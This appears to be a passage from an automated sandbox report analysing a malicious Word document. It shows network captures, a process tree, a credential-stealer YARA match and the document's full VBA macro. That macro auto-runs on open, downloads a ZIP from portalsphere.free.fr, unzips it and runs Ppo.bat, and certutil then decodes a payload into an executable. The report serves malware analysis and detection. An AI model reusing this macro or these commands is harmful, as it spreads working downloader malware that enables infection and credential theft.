                            Mar 4, 2025 09:50:19.306499958 CET | 54098 | 53 | 192.168.2.6 | 1.1.1.1
                            Mar 4, 2025 09:50:19.335891962 CET | 53 | 54098 | 1.1.1.1 | 192.168.2.6
                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                            Mar 4, 2025 09:50:19.306499958 CET | 192.168.2.6 | 1.1.1.1 | 0xd72b | Standard query (0) | portalsphere.free.fr | A (IP address) | IN (0x0001) | false
                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                            Mar 4, 2025 09:50:16.733129978 CET | 1.1.1.1 | 192.168.2.6 | 0x3ccd | No error (0) | ecs-office.s-0005.dual-s-msedge.net | shed.s-0005.dual-s-dc-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 4, 2025 09:50:16.733129978 CET | 1.1.1.1 | 192.168.2.6 | 0x3ccd | No error (0) | shed.s-0005.dual-s-dc-msedge.net | s-0005.dual-s-dc-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 4, 2025 09:50:16.733129978 CET | 1.1.1.1 | 192.168.2.6 | 0x3ccd | No error (0) | s-0005.dual-s-dc-msedge.net | - | 52.123.131.14 | A (IP address) | IN (0x0001) | false
                            Mar 4, 2025 09:50:16.733129978 CET | 1.1.1.1 | 192.168.2.6 | 0x3ccd | No error (0) | s-0005.dual-s-dc-msedge.net | - | 52.123.130.14 | A (IP address) | IN (0x0001) | false
                            Mar 4, 2025 09:50:19.335891962 CET | 1.1.1.1 | 192.168.2.6 | 0xd72b | No error (0) | portalsphere.free.fr | perso154-g5.free.fr | - | CNAME (Canonical name) | IN (0x0001) | false
                            Mar 4, 2025 09:50:19.335891962 CET | 1.1.1.1 | 192.168.2.6 | 0xd72b | No error (0) | perso154-g5.free.fr | - | 212.27.63.154 | A (IP address) | IN (0x0001) | false
                            • portalsphere.free.fr
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.6 | 49719 | 212.27.63.154 | 80 | 5560 | C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            Timestamp | Bytes transferred | Direction | Data
                            Mar 4, 2025 09:50:19.342020035 CET | 337 | OUT | GET /phUploader/uploads/1741130958.zip HTTP/1.1
                            Accept: */*
                            Accept-Language: en-ch
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: portalsphere.free.fr
                            Connection: Keep-Alive
                            Mar 4, 2025 09:50:19.961134911 CET | 1236 | IN | HTTP/1.1 200 OK
                            Date: Tue, 04 Mar 2025 08:50:19 GMT
                            Server: Apache/ProXad [Jan 23 2019 20:05:46]
                            Last-Modified: Mon, 03 Mar 2025 20:00:17 GMT
                            ETag: "2e4e0d125-1736c-67c60a51"
                            Connection: close
                            Accept-Ranges: bytes
                            Content-Length: 95084
                            Content-Type: application/zip
                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 67 5d 59 5a a7 bd e5 37 d8 72 01 00 74 fd 03 00 07 00 00 00 50 70 6f 2e 62 61 74 dc 7d 5b 73 ea ba 96 ee 7b 57 f5 7f 58 2f fb 29 55 27 4e 20 99 f0 70 ba 5a 92 e5 0b c6 10 19 0c 98 3a 2f c1 04 61 6e 4e 20 c1 90 5f 7f 34 86 2c 2e 21 99 2b 59 b3 ba cf a9 ce ae 3d b1 ad db 18 fa c6 55 92 bd fe f3 29 9d e6 7f e5 93 c9 bf ff db e6 e9 75 91 a7 8f 8b bf 9e 56 8f a3 c5 d3 d3 ee f5 69 b5 c9 f2 d5 a6 7c 30 7e 5a 3c ee d5 bf bb e7 47 7c 8e 2d fe ea f2 f0 81 92 0e bf af fe ef 7f c1 f5 bf fe 4f 76 53 7f 94 f5 fb d1 76 fe bf 5e 77 af c7 5a 7c c0 3f a9 f2 b4 7b fa f7 7f 43 22 ba bd 17 41 48 48 d4 1f 87 7f ae af 6b 84 34 25 31 7f 82 fc ec 4f b7 ac 4e de 64 95 bc 92 55 cb 1f 49 da 0d ad 69 cf 9d 3e a7 7b 5a a4 cb fa 2a 5d 3a af be db 9a 8e 96 77 db 31 a3 d9 b0 43 f7 e3 7e 55 3e aa ff 47 bc de f5 dd 9b ed d0 8d df 6c 61 05 8d 43 cf 54 44 8a 98 2e e1 36 21 9d f1 62 12 1f 07 6d 13 e2 4b de 54 85 84 b4 aa 4c fd eb 9b a2 c1 d6 62 07 b2 74 3f 47 32 65 79 a7 ff dc b3 3a c5 69 2b 9f 24 7e 8c 8f [TRUNCATED]
                            Data Ascii: PKg]YZ7rtPpo.bat}[s{WX/)U'N pZ:/anN _4,.!+Y=U)uVi|0~Z<G|-OvSv^wZ|?{C"AHHk4%1ONdUIi>{Z*]:w1C~U>GlaCTD.6!bmKTLbt?G2ey:i+$~Mn&NM`Zcwp5L-SyKW}IvI>a&j,Fn}VV.d@E_kQ>b$%.&BPI)h.uZk@`x&@A$LQ/diAb1M`U:6M(&&nm?Od`CwwRY=C}`<JlH;dmn r0 1AZr)M,{&@g =EYwtS5L9K?8/*PBKx<Lpre{'/z>A2uFw}6zNtWO6olT|~?eiX\f~j\1ukCCA$wZk|8zZMHm6jw7t~;aZKa6N# (q=$Y:X
                            Mar 4, 2025 09:50:19.961174965 CET | 1236 | IN | Data Raw: 8f 88 6f 77 32 09 46 d5 65 45 fa 4a 85 e8 c7 53 f1 42 77 c5 fb 69 dd c0 b2 3c d7 0e 15 4a 61 0e 32 47 b3 44 89 91 6f 2b f5 04 12 5d 5b 44 5e 53 c4 dc 59 00 bc 87 76 0a 8e cd 9b e9 53 b5 e5 5a c4 93 2e 25 a7 f5 93 06 17 d1 16 64 91 49 b9 99 8b e4
                            Data Ascii: ow2FeEJSBwi<Ja2GDo+][D^SYvSZ.%dI4D5o]YHM~F?;;u_2%l]H2VP4hhBX.yp4]`"G3xk<KmLB>{;A}&}Yi8O
                            Mar 4, 2025 09:50:19.961230040 CET | 448 | IN | Data Raw: 65 d9 37 4e 3a 9b 2b 95 a1 c6 ba ae 03 12 be da 32 da 8b 82 1f 63 5b a5 5a ca 11 77 a8 a6 4f 05 59 c9 46 05 4f 91 0a a6 72 47 60 b0 74 92 8b 30 5c 22 b0 31 36 ef ed bb e2 a4 1f d9 da 62 b6 2c 73 3e da a3 d4 37 9d a2 58 f7 95 75 f7 71 da c6 e5 af
                            Data Ascii: e7N:+2c[ZwOYFOrG`t0\"16b,s>7Xuq7E~BB`mB"N@u^CtP!-FE=rGh&jmO9|fatf8P\<(3;*}[sO'U|a))(#DIznx:u
                            Mar 4, 2025 09:50:19.961265087 CET | 1236 | IN | Data Raw: 31 72 5d 5f c0 18 78 dd a5 d4 e7 65 70 96 83 7a 32 03 71 f6 1a 90 55 3c 2e cd 82 4d 5e f4 35 2f e2 0e ed 68 4f 1d 30 e0 ed f9 60 16 1a aa 5f d3 17 b8 4d 36 0d 5d 48 81 87 68 46 4c 1b eb b4 cd a0 cc 8d e8 d9 ea da 2a 9e e0 b8 c4 57 e5 8d 1b 0c 9c
                            Data Ascii: 1r]_xepz2qU<.M^5/hO0`_M6]HhFL*W:Sq6ngzvZwZ-NEi<dC,R94>)3t,ZE`V!`|<[\,oX/*y(dxR#Eq <g3I)
                            Mar 4, 2025 09:50:19.961302042 CET | 224 | IN | Data Raw: 9a 6e 95 7f 72 71 b7 1d a0 87 08 1f b8 48 3b f6 7e 8a b9 2d 9f d2 6d a2 55 7c af 72 59 c1 65 2d 4f b4 57 8f f8 94 e7 89 f6 32 c8 0f df 11 68 37 c5 76 3b de e1 9d 29 f2 40 77 5c 8c ea 39 7a 77 7b 59 f2 fa b8 1e 0f 0a c4 ae 8d fc 2e 8d 07 6c 61 10
                            Data Ascii: nrqH;~-mU|rYe-OW2h7v;)@w\9zw{Y.lapMc6ODvHBe/f!bD;E\NYhj<}5_0|6v7z`2!=d$!w8Ou/`_Y
                            Mar 4, 2025 09:50:19.961335897 CET | 1236 | IN | Data Raw: 76 21 6a ba 7d a2 5a 4e 15 23 02 da 88 92 c8 0d 1a db 1e 41 27 df 2b cb a8 29 e3 b7 75 88 22 82 19 98 25 e2 66 5a 44 86 16 d2 13 85 31 4e a1 86 b9 1f ec 36 91 b3 ac 2f 35 ac f3 c8 21 7e e4 46 3c 39 f0 8d 34 25 aa 8e 11 e3 77 10 e3 3e c0 ea 2c 0f
                            Data Ascii: v!j}ZN#A'+)u"%fZD1N6/5!~F<94%w>,b"}9xQ"=u" AQf`'p5{_:j}O]79NQ[r7z&K`jEG{rhL,/_Ojo[,)i/ZM>+t4wEU9;&olSXaS3;
                            Mar 4, 2025 09:50:19.961369991 CET | 1236 | IN | Data Raw: e0 62 54 c1 29 eb d2 9d af b8 c1 1c e6 55 08 7f d0 10 cf da 12 43 80 50 b9 61 5a a4 8b 7b 2d 12 29 c3 f3 5a 6c 3b de a0 e7 6c fc 12 28 62 a1 a7 44 89 95 a2 74 0d 53 74 2e 4a 69 3e 01 b1 7e ad 26 2a ed df 72 25 12 48 1b 2b 9a 86 ae c3 ca e0 34 d2
                            Data Ascii: bT)UCPaZ{-)Zl;l(bDtSt.Ji>~&*r%H+4tuXPz;`GcDZ!/$Jp?h$X4R}58;X<!g1x=).2rlqUn-eY~k"lpX)n!f{
                            Mar 4, 2025 09:50:19.961406946 CET | 448 | IN | Data Raw: c6 f6 2b b4 39 f2 27 1d 84 b5 cf 3f f2 f7 f6 09 7f de 39 7f d5 73 fe a8 56 cb 44 7e e4 af f6 09 7f f2 9c bf e2 9c bf 40 ab e5 ec 23 7f e1 27 6a d9 11 67 fc 15 1f f8 bb d7 fc 89 8f fc ed 3e e1 2f 38 e3 cf e6 e7 fc 71 ad 96 43 f1 81 bf 99 ff 09 7f
                            Data Ascii: +9'?9sVD~@#'jg>/8qC3By@OK{?oK?g}_?qWEK/q}S-md{W-hoAOx\6\BYt*)@v}81)ULZ=UWT^YS{e}'~
                            Mar 4, 2025 09:50:19.961442947 CET | 1236 | IN | Data Raw: ca f5 d8 98 8f aa a0 7b b5 c7 ba e5 69 87 72 f5 ee a6 51 b6 cb c1 16 b2 69 c8 e1 48 f1 a4 8f 41 af 92 51 a0 33 da be ea bd 3a 0f 96 66 5e d1 bb de 50 32 95 87 f6 aa 8d 37 49 74 10 6f 16 f8 69 e1 e7 1c 73 e6 9b 3b dc b6 5f bd e1 fe 28 2f 52 35 0f
                            Data Ascii: {irQiHAQ3:f^P27Itois;_(/R5WA|lzTl_A)R`{uR{3^~=Ia..ULWtAXSn6HWmx[K4Gf%l)Rce,63
                            Mar 4, 2025 09:50:19.961483002 CET | 1236 | IN | Data Raw: be 50 9b 6f 40 33 e4 d1 fc 14 9a 8a 86 66 b1 9f 0a f9 0d 68 d2 0b 68 9e 8e de 63 fb 39 34 c1 96 91 23 34 ee 94 3f 9e 42 f3 a4 bd c7 63 ba ae 9d 42 33 fa 00 8d 5b 4e 43 f5 08 4d 52 d2 34 3f 42 53 7c 0e cd ba 90 27 d0 6c 22 f7 d4 7b 54 e6 1a 9a 4a
                            Data Ascii: Po@3fhhc94#4?BcB3[NCMR4?BS|'l"{TJsvM2}:zCRO0HytT5=600M0">>@{q:%1F%[5VL=rA;|6Gh&<BS.AS.Oh!;\]BS4{gw#}#4
                            Mar 4, 2025 09:50:19.966681957 CET | 1236 | IN | Data Raw: 47 42 eb 2f da fc bc c3 e7 d6 d8 ea 56 7b 6c 92 dc c1 05 04 6b 6b 89 c1 21 be 39 9b 6e 92 16 7c f9 f3 86 00 de 1f ca 5e a5 2e 13 97 65 ce ed 75 5f 07 73 6f d8 ff a8 8e 47 40 fb a3 7a 19 c4 e1 0b 13 d1 d6 c2 5c 63 bc bd 3d ef 1f df d4 6c 1c ef 1f
                            Data Ascii: GB/V{lkk!9n|^.eu_soG@z\c=luIb+R29G\"RgN2VEb^C!Jk/{@)Us:LdaI6)*?DCzoM'~67qc$Fw0m


Target ID: 0
Start time: 03:50:12
Start date: 04/03/2025
Path: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x1d0000
File size: 1'620'872 bytes
MD5 hash: 1A0C2C2E7D9C4BC18E91604E9B0C7678
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 03:50:24
Start date: 04/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\5564642\Ppo.bat" "
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 8
Start time: 03:50:24
Start date: 04/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 11
Start time: 03:50:27
Start date: 04/03/2025
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\3546255\Ppo.bat" "
Imagebase: 0x1c0000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 12
Start time: 03:50:27
Start date: 04/03/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 13
Start time: 03:50:29
Start date: 04/03/2025
Path: C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit): true
Commandline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Imagebase: 0xf40000
File size: 1'277'440 bytes
MD5 hash: 0DDA4F16AE041578B4E250AE12E06EB1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true

Target ID: 14
Start time: 03:50:34
Start date: 04/03/2025
Path: C:\Windows\SysWOW64\certutil.exe
Wow64 process (32bit): true
Commandline: certutil -decode C:\Users\user\AppData\Local\Temp\i19ag96bvk.txt C:\Users\user\AppData\Local\Temp\i19ag96bvk.exe
Imagebase: 0xf40000
File size: 1'277'440 bytes
MD5 hash: 0DDA4F16AE041578B4E250AE12E06EB1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2373322204.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Call Graph

Module: ThisDocument

Declaration
Line  Content
1     Attribute VB_Name = "ThisDocument"
2     Attribute VB_Base = "1Normal.ThisDocument"
3     Attribute VB_GlobalNameSpace = False
4     Attribute VB_Creatable = False
5     Attribute VB_PredeclaredId = True
6     Attribute VB_Exposed = True
7     Attribute VB_TemplateDerived = True
8     Attribute VB_Customizable = True

APIs / Meta Information
Part of subcall function GenerateRandomValue@ThisDocument: Randomize
Part of subcall function GenerateRandomValue@ThisDocument: Trim
Part of subcall function GenerateRandomValue@ThisDocument: Str
Part of subcall function GenerateRandomValue@ThisDocument: Int
Part of subcall function GenerateRandomValue@ThisDocument: Rnd
Part of subcall function GenerateRandomValue@ThisDocument: lowerbound
MkDir
Part of subcall function downloadFile@ThisDocument: CreateObject
Part of subcall function downloadFile@ThisDocument: Open
Part of subcall function downloadFile@ThisDocument: Send
Part of subcall function downloadFile@ThisDocument: Status
Part of subcall function downloadFile@ThisDocument: CreateObject
Part of subcall function downloadFile@ThisDocument: Open
Part of subcall function downloadFile@ThisDocument: Type
Part of subcall function downloadFile@ThisDocument: Write
Part of subcall function downloadFile@ThisDocument: ResponseBody
Part of subcall function downloadFile@ThisDocument: SaveToFile
Part of subcall function downloadFile@ThisDocument: Close
Part of subcall function Unzip@ThisDocument: NameSpace
Part of subcall function Unzip@ThisDocument: NameSpace
Part of subcall function Unzip@ThisDocument: CopyHere
Part of subcall function Unzip@ThisDocument: Items
CreateObject    CreateObject("WScript.Shell")
MsgBox
Run             IWshShell3.Run("C:\3546255\\Ppo.bat") -> 0
                IWshShell3.Run("C:\5564642\\Ppo.bat") -> 0

Strings (Decrypted Strings)
"http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"
"C:\"
"WScript.Shell"
"File Error loading,please sender.."
Line  Instruction                                                           Meta Information
38    Sub DownloadUnzipAndRun()
39    Dim url as String                                                     executed
40    Dim savePath as String
41    Dim ShellApp as Object
42    Dim rundomnum as String
43    Dim dirr as String
44    url = "http://portalsphere.free.fr/phUploader/uploads/1741130958.zip"
45    rundomnum = GenerateRandomValue
46    dirr = "C:\" & rundomnum & "\"
47    MkDir dirr                                                            MkDir
48    savePath = dirr & "1741130958.zip"
49    downloadFile url, savePath
50    Unzip dirr
51    Dim objShell as Object
52    Set objShell = CreateObject("WScript.Shell")                          CreateObject("WScript.Shell"); executed
53    MsgBox "File Error loading,please sender.."                           MsgBox
54    objShell.Run dirr & "\Ppo.bat"                                        IWshShell3.Run("C:\3546255\\Ppo.bat") -> 0; executed
55    Set WinHttpReq = Nothing
56    Set oStream = Nothing
57    Set ShellApp = Nothing
58    Set objShell = Nothing
59    End Sub

APIs / Meta Information
CreateObject    CreateObject("Microsoft.XMLHTTP")
Open            IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False)
Send
Status          IServerXMLHTTPRequest2.Status() -> 200
CreateObject    CreateObject("ADODB.Stream")
Open            Stream.Open()
Type
Write           Stream.Write(<binary response body, i.e. the downloaded ZIP archive; the report renders it as non-printable placeholder characters, elided here>)
ResponseBody    IServerXMLHTTPRequest2.ResponseBody() -> <same binary ZIP body, elided>
SaveToFile
Close

Strings (Decrypted Strings)
"Microsoft.XMLHTTP"
"GET"
"ADODB.Stream"
"ADODB.Stream"
Line  Instruction                                            Meta Information
9     Sub downloadFile(url as String, fileOutPath as String)
10    Dim WinHttpReq as Object, oStream as Object            executed
11    Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")     CreateObject("Microsoft.XMLHTTP"); executed
12    WinHttpReq.Open "GET", url, False                      IServerXMLHTTPRequest2.Open("GET","http://portalsphere.free.fr/phUploader/uploads/1741130958.zip",False); executed
13    WinHttpReq.Send                                        Send
14    If WinHttpReq.Status = 200 Then                        IServerXMLHTTPRequest2.Status() -> 200; executed
15    Set oStream = CreateObject("ADODB.Stream")             CreateObject("ADODB.Stream"); executed
16    oStream.Open                                           Stream.Open(); executed
17    oStream.Type = 1                                       Type
18    oStream.Write WinHttpReq.ResponseBody                  Stream.Write(<binary ZIP body, elided>); IServerXMLHTTPRequest2.ResponseBody() -> <binary ZIP body, elided>; executed
19    oStream.SaveToFile fileOutPath, 2                      SaveToFile
20    oStream.Close                                          Close
21    Endif
22    End Sub

APIs             Meta Information
MkDir            Part of subcall function DownloadUnzipAndRun@ThisDocument
CreateObject     Part of subcall function DownloadUnzipAndRun@ThisDocument
MsgBox           Part of subcall function DownloadUnzipAndRun@ThisDocument
Run              Part of subcall function DownloadUnzipAndRun@ThisDocument

Line             Instruction                              Meta Information
60               Sub Document_Open()
61               DownloadUnzipAndRun
62 [executed]    End Sub

APIs             Meta Information
MkDir            Part of subcall function DownloadUnzipAndRun@ThisDocument
CreateObject     Part of subcall function DownloadUnzipAndRun@ThisDocument
MsgBox           Part of subcall function DownloadUnzipAndRun@ThisDocument
Run              Part of subcall function DownloadUnzipAndRun@ThisDocument

Line             Instruction                              Meta Information
63               Sub AutoOpen()
64               DownloadUnzipAndRun
65 [executed]    End Sub

APIs             Meta Information
Randomize
Trim
Str
Int
Rnd
lowerbound

Line             Instruction                                                          Meta Information
32               Function GenerateRandomValue() as String
33               Dim randomNum as String
34 [executed]    Randomize                                                            Randomize
35               randomNum = Trim(Str(Int((10000000 - 11 + 1) * Rnd + lowerbound)))  Trim, Str, Int, Rnd, lowerbound
36               GenerateRandomValue = randomNum
37               End Function

APIs             Meta Information
NameSpace
NameSpace
CopyHere
Items

Line             Instruction                                      Meta Information
23               Sub Unzip(dirr as String)
24               Dim sh as Shell32.Shell
25 [executed]    Dim sf as Shell32.Folder
26               Dim df as Shell32.Folder
27               Set sh = New Shell32.Shell
28               Set df = sh.NameSpace(dirr)                      NameSpace
29               Set sf = sh.NameSpace(dirr & "1741130958.zip")   NameSpace
30               df.CopyHere sf.Items                             CopyHere, Items
31               End Sub
